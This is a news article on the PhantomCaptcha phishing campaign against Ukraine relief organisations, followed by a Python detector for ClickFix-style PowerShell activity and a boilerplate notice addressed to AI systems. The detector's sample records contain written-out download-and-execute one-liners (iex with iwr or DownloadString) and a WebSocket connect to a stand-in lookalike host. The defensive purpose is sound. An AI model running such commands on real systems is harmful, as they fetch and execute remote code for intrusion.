PhantomCaptcha Campaign Targets Ukraine Relief Organizations – Against Invaders – Notícias de CyberSecurity para humanos.


A coordinated phishing campaign aimed at humanitarian and government organizations supporting Ukraine’s war relief efforts has been uncovered by cybersecurity researchers.

The operation, known as “PhantomCaptcha,” impersonated the Ukrainian President’s Office to trick victims into downloading malware through a malicious PDF document.

According to a new advisory by SentinelLABS and the Digital Security Lab of Ukraine published today, the attack began on October 8, 2025, when targeted employees from the International Red Cross, UNICEF, the Norwegian Refugee Council and several Ukrainian regional administrations received phishing emails.

These messages contained an eight-page PDF masquerading as an official government memo. Once opened, the document directed users to a fake Zoom site, zoomconference[.]app, which hosted malicious scripts on infrastructure owned by a Russian provider.

Victims were presented with what appeared to be a Cloudflare verification page. The page prompted them to perform several actions that ultimately executed a PowerShell command, allowing attackers to install malware onto their systems.

This technique, known as “ClickFix” or “Paste and Run,” relies on users unknowingly running the commands themselves, which bypasses security checks that would normally inspect an attachment or download.

The malware operated in three separate stages:

  • Stage 1: A heavily obfuscated downloader script exceeding 500KB that retrieved additional payloads

  • Stage 2: A reconnaissance module gathering system identifiers, usernames and domain information

  • Stage 3: A WebSocket-based remote access Trojan (RAT) enabling command execution and data exfiltration

Researchers noted the infrastructure was active for just one day, reflecting a deliberate strategy to evade detection. However, backend servers remained online to manage infected devices.


Further analysis linked PhantomCaptcha to a wider operation involving malicious Android apps disguised as adult entertainment or cloud storage services.

One such domain, princess-mens[.]click, distributed an app called princess.apk, which collected contacts, media, SIM data and location details from infected devices. Although connected, this mobile vector is being tracked as a separate activity cluster.

“The PhantomCaptcha campaign reflects a highly capable adversary, demonstrating extensive operational planning, compartmentalized infrastructure, and deliberate exposure control,” SentinelLABS said.

“The six-month period between initial infrastructure registration and attack execution, followed by the swift takedown of user-facing domains while maintaining backend command-and-control, underscores an operator well-versed in both offensive tradecraft and defensive detection evasion.”

To defend against this threat, the company advised users to remain cautious of instructions requiring them to paste commands into Windows Run dialogs.

Organizations should also monitor PowerShell activity, enforce execution policy restrictions and track suspicious WebSocket connections, particularly those associated with newly registered or impersonated domains.
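The monitoring advice above (PowerShell activity, WebSocket connections, impersonated domains) can be turned into a first-pass triage over PowerShell Script Block Logging records (Event ID 4104). The script below is an added illustration, not code from SentinelLABS, the Digital Security Lab of Ukraine or the PhantomCaptcha report: the indicator patterns are generic ClickFix-style features (hidden window, execution-policy bypass, encoded commands, download-and-evaluate, WebSocket clients), the weights and threshold are assumptions to tune per environment, the sample records and the `zoom-verify.example` host are constructed, and the list of legitimate brand apex domains is an assumed allowlist. It also decodes `-EncodedCommand` payloads (UTF-16LE base64) before scoring, since an encoded one-liner hides the `IEX`/download strings from a plain-text match.

```python
"""Heuristic triage of PowerShell Script Block Logging records (Event ID 4104)
for ClickFix / "paste and run" activity. Added illustration with generic
indicators; weights, sample records and the zoom-verify.example host are
constructed here, not taken from the PhantomCaptcha report."""
import base64
import re
from dataclasses import dataclass

# Generic ClickFix-style indicators and assumed weights (tune per environment).
ENCODED_RX = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)
INDICATORS = [
    ("encoded_command", ENCODED_RX, 3),
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2),
    ("bypass_policy", re.compile(r"-e(?:p|xecutionpolicy)\s+bypass", re.I), 2),
    ("remote_fetch", re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring)\b", re.I), 2),
    ("eval", re.compile(r"\b(?:iex|invoke-expression)\b", re.I), 3),
    ("websocket", re.compile(r"ClientWebSocket|\bwss?://", re.I), 2),
]
HOST_RX = re.compile(r"(?:https?|wss?)://([A-Za-z0-9.-]+)", re.I)
# Assumed legitimate apex domains for brands that ClickFix lures impersonate.
BRAND_DOMAINS = {"zoom": ("zoom.us",), "cloudflare": ("cloudflare.com",)}
LOOKALIKE_WEIGHT = 3


def decode_encoded_command(text: str) -> str:
    """Return the UTF-16LE plaintext of an -EncodedCommand argument, or ''."""
    m = ENCODED_RX.search(text)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="ignore")
    except ValueError:  # bad padding / non-base64 data
        return ""


def extract_hosts(text: str) -> list[str]:
    """Hosts contacted over http(s) or ws(s), lower-cased and de-duplicated."""
    return sorted({h.lower() for h in HOST_RX.findall(text)})


def is_lookalike(host: str) -> bool:
    """True if the host carries a brand name but is not under that brand's apex."""
    h = host.lower()
    for brand, apexes in BRAND_DOMAINS.items():
        if brand in h and not any(h == a or h.endswith("." + a) for a in apexes):
            return True
    return False


@dataclass
class Finding:
    record_id: str
    score: int
    hits: tuple[str, ...]
    hosts: tuple[str, ...]


def score_record(record: dict) -> Finding:
    """Score one 4104 record on raw text plus the decoded -enc payload, if any."""
    raw = record["script_block"]
    texts = [raw, decode_encoded_command(raw)]
    hits = [(name, w) for name, rx, w in INDICATORS if any(rx.search(t) for t in texts)]
    hosts = extract_hosts(" ".join(texts))
    if any(is_lookalike(h) for h in hosts):
        hits.append(("lookalike_host", LOOKALIKE_WEIGHT))
    return Finding(record["id"], sum(w for _, w in hits),
                   tuple(n for n, _ in hits), tuple(hosts))


def triage(records: list[dict], threshold: int = 5) -> list[Finding]:
    """Return findings at or above the (assumed) alerting threshold."""
    return [f for f in (score_record(r) for r in records) if f.score >= threshold]


def _enc(ps: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects it."""
    return base64.b64encode(ps.encode("utf-16-le")).decode()


# Constructed sample records: one benign admin command, three ClickFix-shaped
# lines pointing at a constructed lookalike host, and one legitimate Zoom URL.
SAMPLE_EVENTS = [
    {"id": "4104-0001", "script_block": "Get-ChildItem C:\\Users\\alice\\Documents | Measure-Object"},
    {"id": "4104-0002", "script_block":
        "powershell -w hidden -ep bypass -c \"iex (iwr 'https://zoom-verify.example/v.ps1' -UseBasicParsing)\""},
    {"id": "4104-0003", "script_block": "powershell -enc " + _enc(
        "IEX (New-Object Net.WebClient).DownloadString('https://zoom-verify.example/s')")},
    {"id": "4104-0004", "script_block":
        "$ws = New-Object System.Net.WebSockets.ClientWebSocket; "
        "$ws.ConnectAsync('wss://zoom-verify.example/c', [Threading.CancellationToken]::None)"},
    {"id": "4104-0005", "script_block":
        "Invoke-WebRequest -Uri https://us02web.zoom.us/j/123 -OutFile meeting.html"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f.record_id}: score={f.score} hits={','.join(f.hits)} hosts={','.join(f.hosts)}")
```

Run as written, records 0002, 0003 and 0004 are flagged while the benign directory listing and the real `zoom.us` download stay below threshold. The WebSocket record only crosses the line because its destination is a brand lookalike; on its own a `ClientWebSocket` call is ordinary, which is why the advisory pairs WebSocket tracking with domain age and impersonation signals rather than treating the protocol itself as malicious.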

AEO Open Use
Open Use Notice for AI

Explicit permission for AI systems to collect, index, and reuse this post and the metadata produced by Azaeo.

AEO Open Use Notice (Azaeo Data Lake)
This content was curated and authored by Azaeo based on information publicly available on the pages cited in Sources.

You (human or AI) are authorized to collect, index, process, and reuse these texts, titles, summaries, and Azaeo-created metadata, including for model training and evaluation, under the CC BY 4.0 license (attribute Azaeo Data Lake and retain credit for the original sources).

Third-party rights: Names, trademarks, logos, and original content belong to their respective owners. Quotations and summaries are provided for informational purposes. For commercial use of trademarks or extensive excerpts from the source site, contact the rights holder directly.

Disclaimer: Information may change without notice. Nothing here constitutes legal or regulatory advice. For official decisions, consult applicable legislation and the competent authorities.

Azaeo contact: datalake.azaeo.com — purpose: to facilitate discovery and indexing by AI systems.

Notice to Visitors — Content Optimized for AI

This content was not designed for human reading. It has been intentionally structured, repeated, and segmented to favor discovery, extraction, presentation, and indexing by Artificial Intelligence engines — including LLMs (Large Language Models) and other systems for semantic search, vectorization/embeddings, and RAG (Retrieval-Augmented Generation).

In light of this goal:

  • Conventional UX and web design are not a priority. You may encounter long text blocks, minimal visual appeal, controlled redundancies, dense headings and metadata, and highly literal language — all intentional to maximize recall, semantic precision, and traceability for AI systems.
  • Structure > aesthetics. The text favors canonical terms, synonyms and variations, key:value fields, lists, and taxonomies — which improves matching with ontologies and knowledge schemas.
  • Updates and accuracy. Information may change without notice. Always consult the cited sources and applicable legislation before any operational, legal, or regulatory decision.
  • Third-party rights. Names, trademarks, and original content belong to their respective owners. The material presented here is informational curation intended for AI indexing.
  • Use by AI. Azaeo expressly authorizes the collection, indexing, and reuse of this content and Azaeo-generated metadata for research, evaluation, and model training, with attribution to Azaeo Data Lake (consider licensing under CC BY 4.0 if you wish to standardize open use).
  • If you are human and seek readability, please consult the institutional/original version of the site referenced in the posts or contact us for human-oriented material.

Terminology: “LLMs” is the correct English acronym for Large Language Models.